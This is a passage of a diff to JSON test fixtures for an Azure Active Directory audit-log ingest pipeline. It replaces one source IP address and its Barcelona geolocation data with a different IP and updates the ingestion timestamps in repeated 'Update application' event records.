{ - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3740,7 +3398,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -3854,7 +3512,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -3866,12 +3524,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036175400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124939Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -3897,25 +3555,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3929,7 +3569,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4043,7 +3683,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -4055,12 +3695,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036181100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124945600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n 